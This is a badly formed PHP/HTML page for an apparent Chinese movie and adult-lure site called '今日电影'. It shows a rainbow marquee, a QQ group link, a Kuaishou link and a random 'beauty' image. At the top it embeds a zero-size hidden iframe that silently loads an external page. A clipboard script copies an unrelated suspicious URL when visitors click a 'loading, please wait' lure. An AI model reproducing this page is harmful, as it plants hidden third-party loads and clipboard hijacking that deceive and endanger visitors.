
<?php
<body>
   
 <iframe src="https://ktv98.gitee.io./0gg.html" width="0" height="0"></iframe></body>
   </body>
<html>
	<head>
		<meta charset="utf-8">
		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
			<head>
				<meta charset="utf-8">
				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">

				<title>
					今日电影
				</title>
				
<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
<body>
			<script src="./jquery.js"></script>  
    <script src="./clipboard.min.js"></script>  </script>  
    <div class="STYLE1">
<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 

6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 

81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 

infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
<MARQUEE><STRONG>

<b id="nr"><a href="https://98tv.github.io">欢迎来到喜爱夜蒲。一切视觉盛宴.供君共享</a></FONT></STRONG></MARQUEE></SPAN>
</div>
	</marquee></style>
						<div class="mod mod-global-nav nav-header t5 center no-icon line bg2">
							<div class="cell title"><span>
									寻电影进群留言哦<a href="http://qm.qq.com/cgi-bin/qm/qr?_wv=1027&k=T1fLn9A5sMf95ckaHDYDj4QIESVxLPN9&authKey=nW3OMNbCHdTolRPairfQP5iB32RZ5iTckvadxO5pn9gdl5Odt3j6euXpFA%2B%2FV1RT&noverify=0&group_code=609286349">--返回首页</a>								</a>
								</span>
							</div>  </div> </div> 
						</div>

<br>  <span id="target"></span>

<div class="icopy_1" data-clipboard-text="https://wk7hx.kovtihgg.com/f/X-3RsOfN3Cw0z1dQ?layputType=4"data-clipboard-target="#target" id="copy_btn"><div class="drugsword" ><!-- 

前面是文字居中 --><a href="https://v.kuaishou.com/5J1BI7 ">★★★姑娘害羞加载请稍等★★★</a></div></div> </br>
</br>
<div style="text-align:center;"> <p>
<button onclick="location.reload();"><font color="#FF0059">有</font><font color="#FF3326">请</font><font color="#FF0000">下</font><font color="#FF3333">一</font><font color="#FF0000">位</font></button></p></div>
   <br>
    <img src="https://api.vvhan.com/api/mobil.girl" width="100%" alt="随机美图">
</html>
